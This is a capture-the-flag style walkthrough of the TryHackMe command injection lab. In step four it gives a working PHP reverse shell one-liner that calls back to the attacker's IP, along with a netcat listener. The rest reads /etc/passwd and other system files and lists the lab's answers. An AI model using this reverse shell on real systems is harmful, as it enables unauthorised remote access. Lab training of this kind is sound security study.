TryHackMe-OWASP Top 10-Command Injection Practical

4 min readJul 8, 2021


#1 First, we run the machine we will use.

#2 One minute later when the connection is established we launch our configuration file that we downloaded earlier. As shown below!

Note: you can click here to download your own configuration file.

#3 After the machine starts, we add the evilshell.php extension to the end of the given IP address and type it into the search engine and press enter.

Then we encounter a vulnerable site.We can enter commands using the interface provided on this site.

However, since it is a vulnerable site, it will be more useful to proceed on our own kali machine by applying a reverse shell. But, do not forget that you can also apply commands through the site interface.

#4 Now we listen on port 1414 using netcat

Then, while listening to the port, we write the php reverse shell code to the site we have and press enter.

php -r ‘$sock=fsockopen(“your_ip_address”,port_number);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Don’t forget to set the ip address and port according to you in the php code above.

After getting a reverse shell, we can start solving the questions.

#Answer 1

What strange text file is in the website root directory?

We see the answer to this question as dr pepper by entering the ls command.

#Answer 2

How many non-root/non-service/non-daemon users are there?

For this question, we need to open the passwd file in the /etc folder. Because user or service information is kept in this directory.

As a result we did not encounter any data that is not non-root/non-service/non-daemon. The answer is 0.

#Answer 3

What user is this app running as?

It is enough to do a whoami query to find the user the application is running. So we see that the answer is www-data.

#Answer 4

What is the user’s shell set as?

To find out how the user’s shell is set, we use the /etc/passwd command we wrote in the previous questions. From what we have we see that www-data is set to /usr/sbin/nologin. So the answer is /usr/sbin/nologin.

#Answer 5

What version of Ubuntu is running?

To find the running version of ubuntu, we can open the os-release file in the /etc folder and find general information about ubuntu.According to the information in the file, the version of ubuntu is 18.04.4.

So we can say that the answer is 18.04.4

#Answer 6

Print out the MOTD. What favorite beverage is shown?

When we read the /etc folder for the print motd statement given in the question, we find a file called update-motd.d in it.

When we open this file, the file named 00-header attracts our attention because there was 00-header in the hint next to the question.

When we read the file named 00-header, we find the answer to our question in it. Our answer is dr pepper.

So we answered all the questions.

In this exercise, we have understood a little how important the /etc folder is.

Thank you for taking the time to read my article. I hope it was helpful.



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